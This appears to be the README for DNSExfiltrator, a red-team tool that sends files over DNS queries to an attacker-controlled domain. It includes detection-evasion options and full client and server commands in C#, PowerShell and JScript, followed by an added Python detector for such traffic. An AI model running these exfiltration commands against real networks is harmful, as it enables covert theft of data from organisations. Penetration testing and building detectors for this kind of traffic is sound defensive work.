Author: Arno0x0x - @Arno0x0x
DNSExfiltrator allows for transferring (exfiltrating) a file over a DNS request covert channel. It is basically a data leak testing tool that exfiltrates data over a covert channel.
DNSExfiltrator has two sides:
- The server side (dnsexfiltrator.py), which acts as a custom DNS server and receives the file.
- The client side, available in three forms:
  - dnsExfiltrator.cs: a C# script that can be compiled with csc.exe to provide a Windows managed executable.
  - Invoke-DNSExfiltrator.ps1: a PowerShell script providing the exact same functionalities by wrapping the dnsExfiltrator assembly.
  - dnsExfiltrator.js: a JScript script which is a conversion of the dnsExfiltrator DLL assembly using DotNetToJScript, providing the exact same functionalities.
In order for the whole thing to work you must own a domain name and set the DNS record (NS) for that domain to point to the server that will run the dnsexfiltrator.py server side.
By default, DNSExfiltrator uses the system's defined DNS server, but you can also set a specific one to use (useful for debugging purposes or for running the server side locally for instance).
Alternatively, using the h parameter, DNSExfiltrator can perform DoH (DNS over HTTP) using the Google or CloudFlare DoH servers.
By default, the data to be exfiltrated is base64URL encoded in order to fit into DNS requests. However, some DNS resolvers might break this encoding (fair enough, since FQDNs are not supposed to be case sensitive anyway) by altering the case (upper or lower) of the letters, which is obviously important for the encoding/decoding process. To circumvent this problem you can use the -b32 flag in order to force Base32 encoding of the data, which comes with a little size overhead. If you're using CloudFlare DoH, base32 encoding is automatically applied.
DNSExfiltrator supports basic RC4 encryption of the exfiltrated data, using the provided password to encrypt/decrypt the data.
DNSExfiltrator also provides some optional features to avoid detection (see the throttling and request/label size options in the client parameters below).
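As an added defender-side example (not part of DNSExfiltrator), the following Python scores query names from a resolver log for the traits the channel described above produces: long data labels drawn from a base32 or base64url alphabet with high character entropy, aggregated per client and zone. The log format, the assumption that the zone is the last two labels, the thresholds and every sample line are constructed for this example.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log lines ("<epoch> <client_ip> <qname>"). The two mydomain.com queries
# mimic the channel above: data split into labels of up to 63 chars, in base32 then base64url.
SAMPLE_LOG = """\
1700000000.0 10.0.0.5 www.example.org
1700000000.2 10.0.0.5 K7ZQ2MXBV3JNW6HDP4GCL5RYTASEFIOU.3WPYA6NHQKZ5DBXC2RMLUT7GEIJ4OVSF.mydomain.com
1700000000.4 10.0.0.5 aZ9_bQ-x1Kf8LmN0pQ2rS3tU4vW5xY6zA7bC8dE9fGhIjKlMn.mydomain.com
1700000000.6 10.0.0.7 mail.example.org
"""

B32_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567")
B64URL_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_")

def shannon_entropy(s):
    """Bits per character: encoded file data scores far above ordinary hostnames."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def analyze_qname(qname, zone_labels=2):
    """Split a query name into the zone (assumed: its last two labels) and the data labels."""
    labels = qname.rstrip(".").split(".")
    data_labels, zone = labels[:-zone_labels], ".".join(labels[-zone_labels:])
    payload = "".join(data_labels)
    return {
        "zone": zone,
        "longest_label": max((len(l) for l in data_labels), default=0),
        "payload_len": len(payload),
        "entropy": shannon_entropy(payload),
        # Base32 is compared case-insensitively because resolvers may rewrite label case.
        "b32_like": bool(payload) and set(payload.upper()) <= B32_ALPHABET,
        "b64url_like": bool(payload) and set(payload) <= B64URL_ALPHABET,
    }

def is_suspicious(f, min_payload=40, min_entropy=3.5):
    """Long, high-entropy data labels drawn from an encoding alphabet (thresholds assumed)."""
    return (f["payload_len"] >= min_payload and f["entropy"] >= min_entropy
            and (f["b32_like"] or f["b64url_like"]))

def scan_log(text):
    """Aggregate suspicious queries per (client, zone) with the encoded chars they carried."""
    hits = defaultdict(lambda: {"queries": 0, "payload_chars": 0})
    for line in text.splitlines():
        _, client, qname = line.split()
        f = analyze_qname(qname)
        if is_suspicious(f):
            hits[(client, f["zone"])]["queries"] += 1
            hits[(client, f["zone"])]["payload_chars"] += f["payload_len"]
    return dict(hits)
```

The payload_chars total gives a rough upper bound on how much encoded data a client pushed toward one zone, which is the figure worth alerting and throttling on.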
The only dependency is on the server side, as the dnsexfiltrator.py script relies on the external dnslib library. You can install it using pip:
pip install -r requirements.txt
SERVER SIDE
Start the dnsexfiltrator.py script, passing it the domain name and decryption password to be used:
root@kali:~# ./dnsexfiltrator.py -d mydomain.com -p password
CLIENT SIDE
You can either use the compiled version, or the PowerShell wrapper (which is basically the same thing) or the JScript wrapper. In any case, the parameters are the same, with just a slight difference in the way of passing them in PowerShell.
1/ Using the C# compiled Windows executable (which you can find in the release directory):
dnsExfiltrator.exe <file> <domainName> <password> [-b32] [h=google|cloudflare] [s=<DNS_server>] [t=<throttleTime>] [r=<requestMaxSize>] [l=<labelMaxSize>]
file: [MANDATORY] The name of the file to be exfiltrated.
domainName: [MANDATORY] The domain name to use for DNS requests.
password: [MANDATORY] Password used to encrypt the data to be exfiltrated.
-b32: [OPTIONAL] Use base32 encoding of data. Might be required when a DNS resolver breaks the case of the data.
h: [OPTIONAL] Use Google or CloudFlare DoH (DNS over HTTP) servers.
DNS_Server: [OPTIONAL] The DNS server name or IP to use for DNS requests. Defaults to the system one.
throttleTime: [OPTIONAL] The time in milliseconds to wait between each DNS request.
requestMaxSize: [OPTIONAL] The maximum size in bytes for each DNS request. Defaults to 255 bytes.
labelMaxSize: [OPTIONAL] The maximum size in chars for each DNS request label (subdomain). Defaults to 63 chars.
2/ Using the PowerShell script, well, call it in any of your preferred ways (you probably know tons of ways of invoking a PowerShell script) along with the script parameters. Most basic example:
c:\DNSExfiltrator> powershell
PS c:\DNSExfiltrator> Import-Module .\Invoke-DNSExfiltrator.ps1
PS c:\DNSExfiltrator> Invoke-DNSExfiltrator -i inputFile -d mydomain.com -p password -s my.dns.server.com -t 500
[...]
Check the EXAMPLES section in the script file for further usage examples.
3/ Using the JScript script, pass it the exact same arguments as you would with the standalone Windows executable:
cscript.exe dnsExfiltrator.js inputFile mydomain.com password
Or, with some options:
cscript.exe dnsExfiltrator.js inputFile mydomain.com password s=my.dns.server.com t=500
This tool is intended to be used in a legal and legitimate way only:
Quoting Empire's authors: There is no way to build offensive tools useful to the legitimate infosec industry while simultaneously preventing malicious actors from abusing them.